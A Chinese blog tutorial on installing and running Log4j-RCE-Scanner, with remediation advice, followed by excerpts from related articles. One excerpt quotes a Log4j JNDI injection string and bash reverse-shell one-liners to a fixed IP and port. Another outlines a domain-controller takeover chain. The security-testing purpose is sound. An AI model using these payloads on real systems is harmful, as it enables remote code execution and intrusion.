Log4j-RCE-Scanner 使用教程

于 2024-08-19 09:51:12 发布
阅读量975 收藏 10
点赞数 25
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00380/article/details/141312391
版权

Log4j-RCE-Scanner 使用教程

Log4j-RCE-ScannerRemote command execution vulnerability scanner for Log4j.项目地址:https://gitcode.com/gh_mirrors/lo/Log4j-RCE-Scanner

项目介绍

Log4j-RCE-Scanner 是一个用于检测和利用 Log4j 远程代码执行漏洞的开源工具。该项目旨在帮助安全研究人员和开发人员识别和修复潜在的安全风险。通过自动化扫描,该工具能够快速发现系统中存在的 Log4j 漏洞,并提供相应的修复建议。

项目快速启动

安装

首先,克隆项目仓库到本地:

git clone https://github.com/adilsoybali/Log4j-RCE-Scanner.git
cd Log4j-RCE-Scanner

运行

使用以下命令启动扫描:

python log4j_scan.py --target <目标URL>

例如:

python log4j_scan.py --target http://example.com

应用案例和最佳实践

应用案例

假设你是一家企业的安全工程师,负责定期进行安全审计。你可以使用 Log4j-RCE-Scanner 来扫描公司内部的所有 Web 应用,确保没有 Log4j 漏洞。通过定期扫描和及时修复,可以有效降低安全风险。

最佳实践

  1. 定期扫描:建议每周或每月进行一次全面扫描,确保及时发现新出现的漏洞。
  2. 自动化集成:将扫描工具集成到 CI/CD 流程中,实现在代码部署前自动进行安全检查。
  3. 修复建议:根据扫描结果,及时更新 Log4j 库到最新版本,并修复相关代码。

典型生态项目

相关工具

  • Nuclei:一个快速且可定制的漏洞扫描工具,可以与 Log4j-RCE-Scanner 结合使用,进行更全面的安全检测。
  • Burp Suite:一个流行的 Web 安全测试工具,可以用于手动测试和验证 Log4j 漏洞。

社区资源

  • OWASP:提供丰富的安全资源和指南,帮助开发者和安全专家更好地理解和防御 Log4j 漏洞。
  • GitHub Security Lab:提供各种安全相关的开源项目和工具,可以作为学习和参考的资源。

通过以上内容,您可以快速了解并使用 Log4j-RCE-Scanner 进行安全检测和漏洞修复。希望本教程对您有所帮助!

Log4j-RCE-ScannerRemote command execution vulnerability scanner for Log4j.项目地址:https://gitcode.com/gh_mirrors/lo/Log4j-RCE-Scanner

荣宣廷
关注
扫描工具 -- Nuclei
weixin_41489908的博客
02-03 1万+
只要有足够的勇气,和过去的自己告别,生活就会奖励一个新的开始。。。 ----网易云热评 一、软件介绍 Nuclei基于模块来跨目标发送请求,可以对已知路径有效的扫描,主要用在网络侦查的初始阶段,比较好用的一个地方是,在被WAF后还可以自动重传 二、下载地址: https://github.com/projectdiscovery/nuclei 三、使用方法: 1、查看版本信息:nuvlei -version 2、更新下载模板: https://github.com/pro...
Nuclei:一款快速自定义模板扫描工具
凝聚力安全团队
07-10 6064
Nuclei是一款运行速度非常快且易于使用的扫描工具,它可以帮助研究人员基于模板执行可配置的目标扫描任务,并提供了大量可扩展接口以辅助使用。 Nuclei可以基于模板来跨目标发送请求,能够实现零误报,并且可以帮助研究人员对已知路径执行有效的扫描Nuclei的主要使用场景为网络侦察的初始阶段,可以帮助研究人员快速检查已知且易于探测的目标中是否存在安全漏洞。该工具使用了retryablehttp-go库来处理各种错误,并在Web应用防火墙屏蔽的情况下进行自动重传,这也是该工具的核心模块之一。我们还专门开源了.
《揭秘Apache Log4j漏洞扫描利器:Log4j-RCE-Scanner
gitblog_00040的博客
05-26 376
《揭秘Apache Log4j漏洞扫描利器:Log4j-RCE-ScannerLog4j-RCE-ScannerRemote command execution vulnerability scanner for Log4j.项目地址:https://gitcode.com/gh_mirrors/lo/Log4j-RCE-Scanner 1、项目介绍 在安全领域,Apache Log4j的远...
Log4j-Scan 项目使用教程
gitblog_01032的博客
08-08 348
Log4j-Scan 项目使用教程 log4j-scanA fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228 项目地址:https://gitcode.com/gh_mirrors/lo/log4j-scan 1. 项目的目录结构及介绍 Log4j-Scan 是一个用于检测 ...
Apache Log4j RCE 扫描器 - log4j-scan 指南
gitblog_00935的博客
08-08 466
Apache Log4j RCE 扫描器 - log4j-scan 指南 log4j-scanA fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228 项目地址:https://gitcode.com/gh_mirrors/lo/log4j-scan 1. 项目介绍 log4j-...
Apache Log4j2 RCE漏洞复现(CVE-2021-44228)
siu~
10-31 568
Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过 该漏洞构造特殊的数据请求包,最终触发远程代码执行。
log4j漏洞复现
zzf011900的博客
04-02 895
2.0-2.14.1存在JNDI注入漏洞,导致攻击者可以控制日志内容的情况下,传入${jndi:ldap://xxxxxx.com/rce}的参数进行JNDI注入,执行远程命令。命令:bash -i > /dev/tcp/192.168.59.6/5555 2>&1 0>&1。精简版:bash -i >& /dev/tcp/192.168.59.6/5555 0>&1。/dev/tcp/192.168.59.6/5555 去连接59.6的5555端口。如:http ------web服务。
推荐开源项目:Log4j 扫描工具 - FullHunt Log4j-Scan
gitblog_00053的博客
04-25 511
推荐开源项目:Log4j 扫描工具 - FullHunt Log4j-Scan log4j-scanA fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228 项目地址:https://gitcode.com/gh_mirrors/lo/log4j-scan 是一个强大的自动化扫描...
推荐文章:Log4j-scan - 您的全面Log4Shell漏洞检测解决方案
gitblog_00413的博客
08-08 771
推荐文章:Log4j-scan - 您的全面Log4Shell漏洞检测解决方案 log4j-scanA fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228 项目地址:https://gitcode.com/gh_mirrors/lo/log4j-scan 项目介绍 在数字安全领...
从外网 log4j2 RCE 再到内网组合拳漏洞 CVE-2021-42287、CVE-2021-42278 拿到 DC
lzhy666的博客
10-17 335
具体原理是:假如域内有一台域控名为 DC(域控对应的机器用户为 DC),此时攻击者利用漏洞CVE-2021-42287创建一个机器用户saulGoodman,再把机器用户 saulGoodman的sAMAccountName改成DC。这个时候 KDC 就会判断域内没有 DC 和这个用户,自动去搜索 DC(DC是域内已经的域控DC 的 sAMAccountName),攻击者利用刚刚申请的 TGT进行 S4U2self,模拟域内的域管去请求域控 DC 的 ST 票据,最终获得域控制器DC的权限。
Python安全小工具之日志分析识别AWVS扫描
Mi1k7ea
12-04 4631
本篇文章主要先从客户端和服务端分析AWVS扫描的特征,然后再稍微修改一下Apache的access.log的日志格式、使之可以显示POST请求行内容,最后编写分析识别AWVS扫描的脚本。 AWVS工具的扫描分析: Acunetix Web Vulnerability Scanner(简称AWVS)是一款知名的Web网络漏洞扫描工具,它通过网络爬虫测试你的网站安全,检测流行安全漏洞。
DC-1靶机教程
qq_42553928的博客
04-07 5276
1.明确目标 DC:1 下载地址 https ://download.vulnhub.com/dc/DC-1.zip 2.信息收集 2.1被动信息收集 2.1.1DC:1网页信息收集 https://www.vulnhub.com/entry/dc-1,292/ Description Back to the Top DESCRIPTION DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1238
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
Apache HTTP 过滤器filter、开源WAF(ModSecurity)、Apache 模块开发
西京刀客
03-08 2510
在编写Apache模块时,需要具备C或C++编程经验和对Apache Web服务器的基本了解。另外,需要参考Apache的文档和API参考手册来编写代码和构建模块。
THUCNews中文文本分类数据集包含84万个新闻文档,共14个类别;基于此模型测
最新发布
09-30
THUCNews中文文本分类数据集包含84万个新闻文档,共14个类别;基于此模型测试BERT多个版本的分类性能_ TextClassifier
基于Java的uinshine-fill在线应用设计源码
09-30
该项目是一款基于Java的在线应用设计源码,名为uinshine-fill,集成了Java、JavaScript、HTML、CSS、Shell和Lua等多种编程语言。源码文件共计724个,其中Java文件占比最高,达到472个,紧随其后的是XML和JavaScript文件,分别为51个和47个。此外,还包括HTML、YML、Imports、Properties、JSON、TXT和CSS文件。
基于Java语言的zzyi-cp项目设计源码总结
09-30
该项目为基于Java语言的zzyi-cp设计源码,总计包含441个文件,涵盖382个Java源文件、51个XML配置文件、5个YAML文件、2个Git忽略文件以及1个IML文件。
bugku apache log4j2 rce
03-16
bugku apache log4j2 rce是指一个漏洞,可以通过Apache Log4j2库中的一个特定功能,实现远程代码执行(RCE)攻击。该漏洞可能会导致攻击者获取系统权限,进而对受害者进行攻击和控制。建议用户及时升级相关软件版本,以避免受到攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

荣宣廷

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值